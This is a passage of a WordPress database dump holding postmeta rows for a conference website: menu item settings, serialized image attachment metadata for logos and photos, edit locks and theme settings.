(5359,2284,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5360,2284,'_menu_item_xfn',''),
(5361,2284,'_menu_item_url',''),
(5363,2285,'_menu_item_type','custom'),
(5364,2285,'_menu_item_menu_item_parent','0'),
(5365,2285,'_menu_item_object_id','2285'),
(5366,2285,'_menu_item_object','custom'),
(5367,2285,'_menu_item_target',''),
(5368,2285,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5369,2285,'_menu_item_xfn',''),
(5370,2285,'_menu_item_url',''),
(5372,2286,'_menu_item_type','custom'),
(5373,2286,'_menu_item_menu_item_parent','0'),
(5374,2286,'_menu_item_object_id','2286'),
(5375,2286,'_menu_item_object','custom'),
(5376,2286,'_menu_item_target',''),
(5377,2286,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5378,2286,'_menu_item_xfn',''),
(5379,2286,'_menu_item_url','https://gsw2023.com/index.php/contact/'),
(5381,2287,'_wp_attached_file','2022/10/n1.jpg'),
(5382,2287,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:848;s:4:\"file\";s:14:\"2022/10/n1.jpg\";s:8:\"filesize\";i:252495;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"n1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12886;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"n1-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"n1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5701;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"n1-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63440;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5383,2288,'_wp_attached_file','2022/10/n2.jpg'),
(5384,2288,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:695;s:4:\"file\";s:14:\"2022/10/n2.jpg\";s:8:\"filesize\";i:193484;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"n2-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11213;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"n2-1024x556.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83892;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"n2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5034;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"n2-768x417.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5385,2276,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:12:\"aast32-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:20:\"aast32-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7483;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:20:\"aast32-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18108;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:20:\"aast32-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99502;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:21:\"aast32-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166553;}s:18:\"full-1664971733712\";a:3:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:27:\"aast32-1-e1664971275391.jpg\";}s:23:\"thumbnail-1664971733712\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971275391-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7406;}s:20:\"medium-1664971733712\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971275391-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17664;}s:26:\"medium_large-1664971733712\";a:5:{s:4:\"file\";s:35:\"aast32-1-e1664971275391-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90582;}}'),
(5386,2289,'_wp_attached_file','2022/10/AAST-e1664974838122.jpg'),
(5387,2289,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1772;s:6:\"height\";i:522;s:4:\"file\";s:31:\"2022/10/AAST-e1664974838122.jpg\";s:8:\"filesize\";i:231350;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"AAST-e1664974838122-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10117;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"AAST-e1664974838122-1024x302.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84314;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"AAST-e1664974838122-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7862;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"AAST-e1664974838122-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52479;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"AAST-e1664974838122-1536x452.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163753;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5388,2289,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1772;s:6:\"height\";i:682;s:4:\"file\";s:8:\"AAST.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"AAST-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7217;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:16:\"AAST-300x115.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:115;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12028;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:16:\"AAST-768x296.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:296;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58925;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:17:\"AAST-1024x394.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95642;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:17:\"AAST-1536x591.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184580;}}'),
(5389,2289,'dt-img-hide-title','0'),
(5390,2290,'_elementor_edit_mode','builder'),
(5391,2290,'_elementor_template_type','kit'),
(5392,7,'_wp_page_template','default'),
(5393,7,'_elementor_page_settings','a:1:{s:16:\"site_description\";s:13:\"Egypt GSW2023\";}'),
(5394,2150,'_edit_lock','1664993571:1'),
(5395,388,'_edit_lock','1687707957:4'),
(5396,2082,'_wp_old_date','2022-10-04'),
(5397,2083,'_wp_old_date','2022-10-04'),
(5398,2084,'_wp_old_date','2022-10-04'),
(5399,2281,'_wp_old_date','2022-10-04'),
(5400,2282,'_wp_old_date','2022-10-04'),
(5401,2283,'_wp_old_date','2022-10-04'),
(5402,2284,'_wp_old_date','2022-10-04'),
(5403,2285,'_wp_old_date','2022-10-04'),
(5404,2286,'_wp_old_date','2022-10-04'),
(5405,2283,'_menu_item_the7_mega_menu_settings','a:21:{s:19:\"menu-item-icon-type\";s:4:\"none\";s:15:\"menu-item-image\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:14:\"menu-item-icon\";s:0:\"\";s:24:\"menu-item-image-position\";s:4:\"left\";s:20:\"menu-item-image-size\";s:9:\"50px 50px\";s:29:\"menu-item-image-border-radius\";s:3:\"0px\";s:23:\"menu-item-image-padding\";s:15:\"0px 6px 0px 0px\";s:29:\"menu-item-hide-icon-on-mobile\";s:3:\"off\";s:19:\"menu-item-icon-html\";s:0:\"\";s:19:\"mega-menu-elementor\";s:3:\"off\";s:34:\"mega-menu-elementor-mobile-content\";s:0:\"\";s:9:\"mega-menu\";s:3:\"off\";s:19:\"mega-menu-fullwidth\";s:3:\"off\";s:17:\"mega-menu-columns\";s:1:\"3\";s:20:\"mega-menu-hide-title\";s:3:\"off\";s:21:\"mega-menu-remove-link\";s:3:\"off\";s:23:\"mega-menu-start-new-row\";s:3:\"off\";s:26:\"mega-menu-start-new-column\";s:3:\"off\";s:17:\"mega-menu-widgets\";s:4:\"none\";s:25:\"mega-menu-widgets-padding\";s:15:\"0px 6px 0px 0px\";s:24:\"mega-menu-hide-on-mobile\";s:3:\"off\";}'),
(5406,2308,'_wp_attached_file','2022/10/mlogo.jpg'),
(5407,2308,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:200;s:4:\"file\";s:17:\"2022/10/mlogo.jpg\";s:8:\"filesize\";i:106546;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"mlogo-300x38.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2680;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"mlogo-1024x128.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15383;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"mlogo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"mlogo-768x96.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10045;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"mlogo-1536x192.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5408,2309,'_wp_attached_file','2022/10/mlogo-1.jpg'),
(5409,2309,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-1.jpg\";s:8:\"filesize\";i:106546;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-1-300x38.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2680;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"mlogo-1-1024x128.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15383;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-1-768x96.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10045;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-1-1536x192.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5410,2310,'_wp_attached_file','2022/10/mlogo-2.jpg'),
(5411,2310,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-2.jpg\";s:8:\"filesize\";i:106546;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-2-300x38.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2680;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"mlogo-2-1024x128.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15383;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-2-768x96.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10045;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-2-1536x192.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5412,2311,'_wp_attached_file','2022/10/mlogo-3.jpg'),
(5413,2311,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-3.jpg\";s:8:\"filesize\";i:106546;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-3-300x38.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:38;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2680;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"mlogo-3-1024x128.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15383;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4446;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-3-768x96.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10045;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-3-1536x192.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5414,2312,'_wp_attached_file','2022/10/mlogo-4.jpg'),
(5415,2312,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2000;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-4.jpg\";s:8:\"filesize\";i:111339;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-4-300x30.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2123;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"mlogo-4-1024x102.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11680;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4823;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-4-768x77.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:77;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7557;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-4-1536x154.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21492;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5416,2313,'_wp_attached_file','2022/10/mlogo-5.jpg'),
(5417,2313,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-5.jpg\";s:8:\"filesize\";i:113423;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-5-300x27.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1877;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"mlogo-5-1024x93.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10398;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4816;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-5-768x70.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6575;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-5-1536x140.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18421;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:20:\"mlogo-5-2048x186.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28473;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5418,2314,'_wp_attached_file','2022/10/mlogo-6.jpg'),
(5419,2314,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-6.jpg\";s:8:\"filesize\";i:113423;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-6-300x27.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1877;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"mlogo-6-1024x93.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10398;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4816;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-6-768x70.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6575;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-6-1536x140.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18421;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:20:\"mlogo-6-2048x186.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28473;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5420,2315,'_wp_attached_file','2022/10/mlogo-7.jpg'),
(5421,2315,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-7.jpg\";s:8:\"filesize\";i:113423;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-7-300x27.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:27;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1877;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"mlogo-7-1024x93.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10398;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4816;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-7-768x70.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6575;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-7-1536x140.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18421;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:20:\"mlogo-7-2048x186.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28473;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5422,2316,'_wp_attached_file','2022/10/mlogo-8.jpg'),
(5423,2316,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2022/10/mlogo-8.jpg\";s:8:\"filesize\";i:116544;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"mlogo-8-300x25.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1765;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"mlogo-8-1024x85.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9073;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"mlogo-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4823;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"mlogo-8-768x64.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5670;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"mlogo-8-1536x128.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16613;